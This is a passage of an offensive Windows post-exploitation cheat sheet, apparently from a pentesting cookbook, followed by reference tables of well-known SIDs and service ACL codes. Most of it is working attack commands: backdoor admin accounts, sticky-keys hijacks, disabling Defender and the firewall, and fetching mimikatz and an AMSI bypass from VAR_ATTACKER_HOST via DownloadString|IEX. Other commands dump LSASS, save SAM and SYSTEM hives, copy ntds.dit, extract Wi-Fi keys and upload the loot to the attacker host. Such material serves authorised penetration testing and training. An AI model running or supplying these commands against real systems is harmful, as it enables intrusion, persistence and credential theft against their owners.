        ~PS> $a.command.a.execute | iex

    `` Installing root certificate

        ~> certutil.exe -addstore -f -user Root %TEMP%\cert.cer
        ~PS> Import-Certificate -FilePath %TEMP%\cert.cer -CertStoreLocation Cert:\CurrentUser\Root\

    `` diskshadow.exe

        `` Interactive

            ~> c:\windows\system32\diskshadow.exe
            > exec calc.exe
            > exec "cmd.exe" /c calc.exe
            > exit

        `` Script (diskshadow.txt)

            set context persistent nowriters
            add volume c: alias someAlias
            create
            expose %someAlias% z:
            exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
            exec "cmd.exe" /c reg.exe save hklm\system c:\exfil\system.bak
            delete shadows volume %someAlias%
            reset

        `` Execution

            ~> diskshadow.exe /s c:\test\diskshadow.txt

        `` Persistence

            ~> schtasks.exe /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt"

            ~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt"

        `` Uninstall Windows patch

            ~> wusa /uninstall /kb:4498932 /quiet /norestart

`` Persistence

    `` Registry

        -- Screen saver
        ~> reg.exe add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /d c:\shell.cmd

        ~PS> New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name PersistCalc -PropertyType String -Value "C:\Windows\System32\calc.exe"

    `` Accounts

        `` CLI

            ~> net.exe user VAR_USERNAME VAR_PASSWORD /add
            ~> net.exe localgroup administrators VAR_USERNAME /add
            ~> net.exe localgroup "Remote Desktop Users" VAR_USERNAME /add

        `` useradd.c

            @ snippets/windows/backdoors/useradd.c

    `` Services

        `` Use e.g. ServiceWrapper

            -- Executable must be wrapped as a Windows service
            ~> sc.exe create VAR_NAME binpath= "C:\Program Files\Intel\update.exe"

            -- Now allow all authenticated users to take control over the service using SDDL format, e.g.
            ~> sc.exe sdshow VAR_NAME
            D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

            -- VAR_STRING must be the result from sc sdshow plus "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)" (allow all to authenticated users) (in the D: section, right before S:)
            ~> sc.exe sdset VAR_NAME VAR_STRING

        `` Launch command prompt on demand

            ~> sc.exe create VAR_NAME binpath= "cmd.exe /K start" type= own type= interact start= demand
            -- Add permissions as above

    `` Services

        ~> sc.exe \\VAR_TARGET_HOST create VAR_STRING binpath= "c:\Windows\Temp\foobar.exe"
        ~> sc.exe \\VAR_TARGET_HOST start VAR_STRING
        ~> sc.exe \\VAR_TARGET_HOST delete VAR_STRING

    `` Registry

        `` Command will run every time a user logs in as the user

            ~> reg.exe add "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING" /t REG_SZ /d "VAR_STRING"

        `` Query the remote registry

            ~> reg.exe query "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING"

        `` Delete the remote registry

            ~> reg.exe delete "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING"

    `` Startup

        `` Executes every time a user logs in

            ~> xcopy foobar.exe "\\VAR_TARGET_HOST\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\launcher.bat"

    `` Scheduler

        `` Create new task and execute it

            ~> schtasks.exe /create /tn VAR_STRING /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S VAR_TARGET_HOST /RU System
            ~> schtasks.exe /run /tn VAR_STRING /S VAR_TARGET_HOST

            ~> schtasks.exe /create /sc minute /mo 10 /tn VAR_STRING /tr c:\windows\temp\foobar.exe

        `` Delete the task after it is executed

            ~> schtasks.exe /F /delete /tn VAR_STRING /S VAR_TARGET_HOST

    `` Windows Firewall

        `` Stop service
        ~> net.exe stop MspSvc

        ~> netsh.exe advfirewall set allprofiles state off
        ~> netsh.exe advfirewall show allprofiles
        ~> netsh.exe firewall set opmode disable

    `` RDP

        ~> net.exe start TermService
        ~> netsh.exe add portopening TCP 3389 "Remote Desktop"
        ~> netsh.exe firewall set service RemoteAdmin enable
        ~> netsh.exe firewall set service RemoteDesktop enable
        ~> sc.exe config TermService start= auto

        ~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 1 /f
        ~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        ~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        ~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

        `` Enable restricted admin mode

            ~> reg.exe add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "DisableRestrictedAdmin" /t REG_DWORD /d 0 /f

    `` Enabling scripts in Outlook client

        `` Outlook 2016

            ~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f

        `` Outlook 2013

            ~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f

        `` Outlook 2010

            ~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f

    `` Physical access

        `` Replace with cmd.exe (Sticky Keys)

            -- SHIFT 5 times
            C:\Windows\System32\sethc.exe

            -- WINDOWS+U
            C:\Windows\System32\Utilman.exe

            -- WINDOWS+U, on-screen keyboard
            C:\Windows\System32\osk.exe

            -- WINDOWS+P
            C:\Windows\System32\DisplaySwitch.exe

        `` Attach debugger, for example:

            ~> reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe /k" /f

        `` Windows 10 (virtual keyboard)

            ~> reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

    `` Runas

        @ snippets/windows/utils/runas*

`` Looting

    `` Standard looting procedure after getting local admin

        -- Start HTTP receiver
        ~$ ~/lib/pentesting-cookbook/bin/httpd.py -p 8008

        -- Is Tamper Protection enabled?
        ~PS> (Get-MpComputerStatus).IsTamperProtected 
 
        -- If not, disable Windows Defender, sample submission and cloud analytics
        -- Otherwise disable Tamper Protection using GUI first
        ~> powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring 1 -SubmitSamplesConsent NeverSend -MAPSReporting Disabled"

        -- Download tools
        ~> mkdir c:\Windows\Tasks\tmp\
        ~> curl.exe "http://VAR_ATTACKER_HOST/mimidrv.sys" -o C:\Windows\system32\IntelAudioRTX.sys
        ~> curl.exe "http://VAR_ATTACKER_HOST/minidump.exe" -o C:\Windows\Tasks\tmp\minidump.exe
        ~> curl.exe "http://VAR_ATTACKER_HOST/mimikatz.exe" -o C:\Windows\Tasks\tmp\mimikatz.exe

        -- Disable LSASS process protection
        ~> sc.exe create IntelAudioRTX binPath= C:\Windows\system32\IntelAudioRTX.sys type= kernel start= demand
        ~> sc.exe start IntelAudioRTX
        ~> powershell
        ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/amsi.txt') | IEX
        ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/mimikatz.txt') | IEX
        ~PS> Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
        ~PS> exit

        -- Dump LSASS process memory
        ~> mkdir C:\Windows\Tasks\tmp\loot
        ~> C:\Windows\Tasks\tmp\minidump.exe
        ~> move C:\Windows\Tasks\lsass.dmp C:\Windows\Tasks\tmp\loot\

        -- Grab the most important things related to Kerberos and locally stored credentials
        ~> powershell
        ~PS> cd C:\Windows\Tasks\tmp\loot
        ~PS> C:\Windows\Tasks\tmp\mimikatz.exe "privilege::debug" "sekurlsa::minidump C:\Windows\Tasks\tmp\loot\lsass.dmp" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "sekurlsa::ekeys" exit > C:\Windows\Tasks\tmp\loot\mimikatz.log

        -- Compress and send home (using ~/lib/pentesting-cookbook/bin/httpd.py on the other end)
        ~> tar.exe -a -c -f C:\Windows\Tasks\tmp.zip C:\Windows\Tasks\tmp\loot
        -- Configure the client in case there's a web proxy
        ~PS> [System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy()
        ~PS> [System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
        -- And now send home (using ~/lib/pentesting-cookbook/bin/httpd.py on the other end)
        ~PS> (New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8008/dc.example.com.zip', 'C:\Windows\Tasks\tmp.zip')

    `` Passwords

        `` Registry

            - HKCU\Software\ORL\WinVNC3\Password
            - HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologi
            - HKLM\SYSTEM\CurrentControlSet\Services\SNMP
            - HKCU\Software\TightVNC\Server
            - HKCU\Software\SimonTatham\PuTTY\Sessions
            - HKCU\Software\OpenSSH\Agent\Key

            ~> reg.exe save "HKLM\SYSTEM" %TEMP%\SYSTEM.bak
            ~> reg.exe save "HKLM\SAM" %TEMP%\SAM.bak
            ~> reg.exe save "HKLM\SECURITY" %TEMP%\SECURITY.bak

            ~> reg.exe query HKLM /f password /t REG_SZ /s
            ~> reg.exe query HKCU /f password /t REG_SZ /s

        `` Windows Server 2007

            C:\Windows\System32\config\SAM
            C:\Windows\System32\config\SYSTEM
            C:\Windows\System32\config\RegBack\SAM
            C:\Windows\System32\config\RegBack\SAM.OLD
            C:\Windows\System32\config\RegBack\SYSTEM
            C:\Windows\System32\config\RegBack\SYSTEM.OLD

        `` Windows XP

            C:\Windows\repair\SAM
            C:\Windows\repair\SECURITY
            C:\Windows\repair\system

        `` Other locations

            ~> dir %SYSTEMROOT%\repair\SAM 2>nul
            ~> dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
            ~> dir %SYSTEMROOT%\System32\config\SAM 2>nul
            ~> dir %SYSTEMROOT%\repair\system 2>nul
            ~> dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
            ~> dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
            ~> dir /a /b /s SAM.b*

        `` Windows Autologin

            ~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

        `` Putty

            ~> reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions"

        `` Stored credentials (DPAPI)

            `` Windows Vista and later

                - C:\Users\VAR_USERNAME\AppData\Roaming\Microsoft\Credentials
                - C:\Users\VAR_USERNAME\AppData\Local\Microsoft\Credentials

            `` Windows 8 and later
            
                - C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials

            `` Windows XP
            
                - C:\Documents and Settings\VAR_USERNAME\Application Data\Microsoft\Credentials
                - C:\Documents and Settings\VAR_USERNAME\Local Settings\Application Data\Microsoft\Credentials

            `` Vault
            
                - C:\Users\VAR_USERNAME\AppData\Local\Microsoft\Vault
                - C:\ProgramData\Microsoft\Vault
                - C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault                

            ~$ python /opt/impacket/examples/dpapi.py credential -file credentials

        `` Force wdigest provider to keep passwords, ask users to log in:

            ~> reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

    `` Wireless

            -- Grab all keys
            ~> netsh.exe wlan show profile name=* key=clear

            -- [Source: https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Credential_Access/Wifi_Passwords.txt]

            ~> powershell.exe netsh.exe wlan show profiles|Select-String -Pattern " User Profile"|ForEach-Object{echo $_.Line.split(':')[1].trim()}|ForEach-Object{netsh.exe wlan show profiles name=$_ key=clear}|Select-String -Pattern "Key Content|SSID name"

            -- Windows 10
            ~> powershell.exe (netsh.exe wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh.exe wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ SID_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

            -- Windows 7 or PS Version 2.0
            ~> (netsh.exe wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} |%{(netsh.exe wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} | %{[PSCustomObject]@{ SID_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

    `` GPP

        ~> findstr.exe /S /I cpassword \\VAR_DOMAIN\sysvol\VAR_DOMAIN\*.xml

        ~> ruby gppdecrypt.rb encrypted_output
        ~PS> Get-GPPPassword

`` Lateral Movement

    `` Networking

        `` Opening ports

            -- Legacy
            ~> netsh.exe firewall add portopening tcp VAR_TARGET_PORT "VAR_STRING"

            -- Current
            ~> netsh.exe advfirewall firewall add rule name="VAR_STRING" dir=in action=allow protocol=TCP localport=VAR_TARGET_PORT
            ~> netsh.exe advfirewall firewall add rule name="VAR_STRING" dir=in action=allow program="C:\VAR_STRING.exe" enable=yes

    `` Enabling psexec

        ~> net.exe use \\VAR_TARGET_HOST\ipc$ VAR_USERNAME /user:VAR_PASSWORD
        ~> sc.exe \\VAR_TARGET_HOST config netdde start= auto
        ~> sc.exe \\VAR_TARGET_HOST config netddedsdm start= auto
        ~> sc.exe \\VAR_TARGET_HOST config clipsrv start= auto
        ~> sc.exe \\VAR_TARGET_HOST start netdde
        ~> sc.exe \\VAR_TARGET_HOST start netddedsdm
        ~> sc.exe \\VAR_TARGET_HOST start clipserv

    `` PsExec

        ~> PsExec.exe -accepteula \\VAR_TARGET_HOST -u VAR_DOMAIN\VAR_USERNAME cmd.exe
        ~$ impacket-psexec.py VAR_DOMAIN/VAR_USERNAME@VAR_TARGET_HOST cmd -path c:\\windows\\system32

    `` WMI

        `` Windows

            ~> wmic.exe /node:computername /user:VAR_DOMAIN\VAR_USERNAME path win32_process call create "VAR_STRING"
            ~> wmic.exe /node:@textfile /user:VAR_DOMAIN\VAR_USERNAME path win32_process call create "VAR_STRING"

        `` Linux

            ~$ pth-winexe -U VAR_DOMAIN/VAR_USERNAME%VAR_LM_HASH:VAR_NT_HASH //VAR_TARGET_HOST cmd.exe
            ~$ wmiexec.py -hashes VAR_LM_HASH:VAR_NT_HASH VAR_USERNAME@VAR_TARGET_HOST
            ~$ wmiexec.py -hashes VAR_LM_HASH:VAR_NT_HASH VAR_DOMAIN/Administrator@VAR_TARGET_HOST "taskkill /f /fi \"USERNAME eq Administrator\""

    `` RDP

        ~$ xfreerpd /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST
        
        -- Low bandwidth
        ~$ xfreerdp -themes -wallpaper +compression +clipboard /bpp:16 /v:VAR_TARGET_HOST /u:VAR_USERNAME /rfx /rfx-mode:video /gfx +gfx-progressive +gfx-h264 /p:'VAR_PASSWORD'

    `` WinRM

        `` Configure the remote machine to work with WinRM

            ~PS> Enable-PSRemoting -Force

        `` Testing the WinRM Connection

            ~PS> Test-WSMan VAR_TARGET_HOST

        `` Adding Trusted Host in WinRM

            ~> winrm set winrm/config/client @{TrustedHosts="VAR_ATTACKER_HOST"}

        `` Execute commands using Powershell Invoke-Command on the target over WinRM

            ~PS> Invoke-Command -ComputerName VAR_TARGET_HOST -ScriptBlock {ipconfig.exe /all}

        `` Interactive session

            ~PS> C:\> Enter-PSSession -ComputerName VAR_TARGET_HOST
            ~PS> C:\> Enter-PSSession -ComputerName VAR_TARGET_HOST -credential VAR_DOMAIN\VAR_USERNAME switch

        `` Disable Powershell Remoting

            ~PS> C:\Windows\system32> Disable-PSRemoting

    `` DCOM

        `` DCOM applications via MMC Application Class (MMC20.Application)

            ~PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","IPAddress"))
            ~PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7)

        `` DCOM via ShellExecute

            ~PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"IPAddress")
            ~PS> $obj = [System.Activator]::CreateInstance($com)
            ~PS> $item = $obj.Item()
            ~PS> $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)

        `` DCOM via ShellBrowserWindow (Windows 10)

            ~PS> $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"IPAddress")
            ~PS> $obj = [System.Activator]::CreateInstance($com)
            ~PS> $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)

    `` Shutdown

        ~> net.exe rpc shutdown -I VAR_TARGET_IP -U VAR_USERNAME%VAR_PASSWORD

`` Environment Variables

    - %ALLUSERSPROFILE%
    - %COMPUTERNAME%
    - %COMSPEC%
    - %DATE%
    - %HOMEDRIVE%
    - %HOMEPATH%
    - %HOMESHARE%
    - %LOGONSEVER%
    - %PATH%
    - %PATHEXT%
    - %RANDOM%
    - %SYSTEM32%
    - %SYSTEMDRIVE%
    - %SYSTEMROOT%
    - %TEMP%
    - %TIME%
    - %USERDOMAIN%
    - %USERNAME%
    - %USERPROFILE%
    - %USERSID%
    - %WINDIR%

`` Well-known SIDs (all versions of Windows):

    -- Source: https://support.microsoft.com/en-au/help/243330/well-known-security-identifiers-in-windows-operating-systems

    - S-1-0 - Null Authority - An identifier authority.
    - S-1-0-0 - Nobody - No security principal.
    - S-1-1 - World Authority - An identifier authority.
    - S-1-1-0 - Everyone - A group that includes all users, even anonymous users and guests. Membership is controlled by the operating system. Note: By default, the Everyone group no longer includes anonymous users on a computer that is running Windows XP Service Pack 2 (SP2).
    - S-1-2 - Local Authority - An identifier authority.
    - S-1-2-0 - Local - A group that includes all users who have logged on locally.
    - S-1-3 - Creator Authority - An identifier authority.
    - S-1-3-0 - Creator Owner - A placeholder in an inheritable access control entry (ACE). When the ACE is inherited, the system replaces this SID with the SID for the object's creator.
    - S-1-3-1 - Creator Group - A placeholder in an inheritable ACE. When the ACE is inherited, the system replaces this SID with the SID for the primary group of the object's creator. The primary group is used only by the POSIX subsystem.
    - S-1-3-4 - Owner Rights - A group that represents the current owner of the object. When an ACE that carries this SID is applied to an object, the system ignores the implicit READ_CONTROL and WRITE_DAC permissions for the object owner.
    - S-1-4 - Non-unique Authority - An identifier authority.
    - S-1-5 - NT Authority - An identifier authority.
    - S-1-5-1 - Dialup - A group that includes all users who have logged on through a dial-up connection. Membership is controlled by the operating system.
    - S-1-5-2 - Network - A group that includes all users that have logged on through a network connection. Membership is controlled by the operating system.
    - S-1-5-3 - Batch - A group that includes all users that have logged on through a batch queue facility. Membership is controlled by the operating system.
    - S-1-5-4 - Interactive - A group that includes all users that have logged on interactively. Membership is controlled by the operating system.
    - S-1-5-5-X-Y - Logon Session - A logon session. The X and Y values for these SIDs are different for each session.
    - S-1-5-6 - Service - A group that includes all security principals that have logged on as a service. Membership is controlled by the operating system.
    - S-1-5-7 - Anonymous - A group that includes all users that have logged on anonymously. Membership is controlled by the operating system.
    - S-1-5-9 - Enterprise Domain Controllers - A group that includes all domain controllers in a forest that uses an Active Directory directory service. Membership is controlled by the operating system.
    - S-1-5-10 - Principal Self - A placeholder in an inheritable ACE on an account object or group object in Active Directory. When the ACE is inherited, the system replaces this SID with the SID for the security principal who holds the account.
    - S-1-5-11 - Authenticated Users - A group that includes all users whose identities were authenticated when they logged on. Membership is controlled by the operating system.
    - S-1-5-12 - Restricted Code - This SID is reserved for future use.
    - S-1-5-13 - Terminal Server Users - A group that includes all users that have logged on to a Terminal Services server. Membership is controlled by the operating system.
    - S-1-5-14 - Remote Interactive Logon - A group that includes all users who have logged on through a terminal services logon.
    - S-1-5-17 - This Organization - An account that is used by the default Internet Information Services (IIS) user.
    - S-1-5-18 - Local System - A service account that is used by the operating system.
    - S-1-5-19 - NT Authority - Local Service
    - S-1-5-20 - NT Authority - Network Service
    - S-1-5-21domain-500 - Administrator - A user account for the system administrator. By default, it is the only user account that is given full control over the system.
    - S-1-5-21domain-501 - Guest - A user account for people who do not have individual accounts. This user account does not require a password. By default, the Guest account is disabled.
    - S-1-5-21domain-502 - KRBTGT - A service account that is used by the Key Distribution Center (KDC) service.
    - S-1-5-21domain-512 - Domain Admins - A global group whose members are authorized to administer the domain. By default, the Domain Admins group is a member of the Administrators group on all computers that have joined a domain, including the domain controllers. Domain Admins is the default owner of any object that is created by any member of the group.
    - S-1-5-21domain-513 - Domain Users - A global group that, by default, includes all user accounts in a domain. When you create a user account in a domain, it is added to this group by default.
    - S-1-5-21domain-514 - Domain Guests - A global group that, by default, has only one member, the domain's built-in Guest account.
    - S-1-5-21domain-515 - Domain Computers - A global group that includes all clients and servers that have joined the domain.
    - S-1-5-21domain-516 - Domain Controllers - A global group that includes all domain controllers in the domain. New domain controllers are added to this group by default.
    - S-1-5-21domain-517 - Cert Publishers - A global group that includes all computers that are running an enterprise certification authority. Cert Publishers are authorized to publish certificates for User objects in Active Directory.
    - S-1-5-21root domain-518 - Schema Admins - A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make schema changes in Active Directory. By default, the only member of the group is the Administrator account for the forest root domain.
    - S-1-5-21root domain-519 - Enterprise Admins - A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make forest-wide changes in Active Directory, such as adding child domains. By default, the only member of the group is the Administrator account for the forest root domain.
    - S-1-5-21domain-520 - Group Policy Creator Owners - A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator.
    - S-1-5-21domain-526 - Key Admins - A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
    - S-1-5-21domain-527 - Enterprise Key Admins - A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
    - S-1-5-21domain-553 - RAS and IAS Servers - A domain local group. By default, this group has no members. Servers in this group have Read Account Restrictions and Read Logon Information access to User objects in the Active Directory domain local group.
    - S-1-5-32-544 - Administrators - A built-in group. After the initial installation of the operating system, the only member of the group is the Administrator account. When a computer joins a domain, the Domain Admins group is added to the Administrators group. When a server becomes a domain controller, the Enterprise Admins group also is added to the Administrators group.
    - S-1-5-32-545 - Users - A built-in group. After the initial installation of the operating system, the only member is the Authenticated Users group. When a computer joins a domain, the Domain Users group is added to the Users group on the computer.
    - S-1-5-32-546 - Guests - A built-in group. By default, the only member is the Guest account. The Guests group allows occasional or one-time users to log on with limited privileges to a computer's built-in Guest account.
    - S-1-5-32-547 - Power Users - A built-in group. By default, the group has no members. Power users can create local users and groups; modify and delete accounts that they have created; and remove users from the Power Users, Users, and Guests groups. Power users also can install programs; create, manage, and delete local printers; and create and delete file shares.
    - S-1-5-32-548 - Account Operators - A built-in group that exists only on domain controllers. By default, the group has no members. By default, Account Operators have permission to create, modify, and delete accounts for users, groups, and computers in all containers and organizational units of Active Directory except the Builtin container and the Domain Controllers OU. Account Operators do not have permission to modify the Administrators and Domain Admins groups, nor do they have permission to modify the accounts for members of those groups.
    - S-1-5-32-549 - Server Operators - A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer.
    - S-1-5-32-550 - Print Operators - A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues.
    - S-1-5-32-551 - Backup Operators - A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down.
    - S-1-5-32-552 - Replicators - A built-in group that is used by the File Replication service on domain controllers. By default, the group has no members. Do not add users to this group.
    - S-1-5-32-582 - Storage Replica Administrators - A built-in group that grants complete and unrestricted access to all features of Storage Replica.
    - S-1-5-64-10 - NTLM Authentication - An SID that is used when the NTLM authentication package authenticated the client.
    - S-1-5-64-14 - SChannel Authentication - An SID that is used when the SChannel authentication package authenticated the client.
    - S-1-5-64-21 - Digest Authentication - An SID that is used when the Digest authentication package authenticated the client.
    - S-1-5-80 - NT Service - An NT Service account prefix.

`` Windows Service ACLs

    -- sc.exe sdshow VAR_STRING

    - The first letter after brackets means: allow (A) or deny (D).

    - S: — System Access Control List (SACL)
    - D: — Discretionary ACL (DACL)

    - CC — SERVICE_QUERY_CONFIG (request service settings)
    - LC — SERVICE_QUERY_STATUS (service status polling)
    - SW — SERVICE_ENUMERATE_DEPENDENTS
    - LO — SERVICE_INTERROGATE
    - CR — SERVICE_USER_DEFINED_CONTROL
    - RC — READ_CONTROL
    - RP — SERVICE_START
    - WP — SERVICE_STOP
    - DT — SERVICE_PAUSE_CONTINUE

    - AU Authenticated Users
    - AO Account operators
    - RU Alias to allow previous Windows 2000
    - AN Anonymous logon
    - AU Authenticated users
    - BA Built-in administrators
    - BG Built-in guests
    - BO Backup operators
    - BU Built-in users
    - CA Certificate server administrators
    - CG Creator group
    - CO Creator owner
    - DA Domain administrators
    - DC Domain computers
    - DD Domain controllers
    - DG Domain guests
    - DU Domain users
    - EA Enterprise administrators
    - ED Enterprise domain controllers
    - WD Everyone
    - PA Group Policy administrators
    - IU Interactively logged-on user
    - LA Local administrator
    - LG Local guest
    - LS Local service account
    - SY Local system
    - NU Network logon user
    - NO Network configuration operators
    - NS Network service account
    - PO Printer operators
    - PS Personal self
    - PU Power users
    - RS RAS servers group
    - RD Terminal server users
    - RE Replicator
    - RC Restricted code
    - SA Schema administrators
    - SO Server operators
    - SU Service logon user

`` Research

    `` System-wide proxy

        `` Enable

            ~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d 127.0.0.1:8080 /f
            ~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f

        `` Disable

            ~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f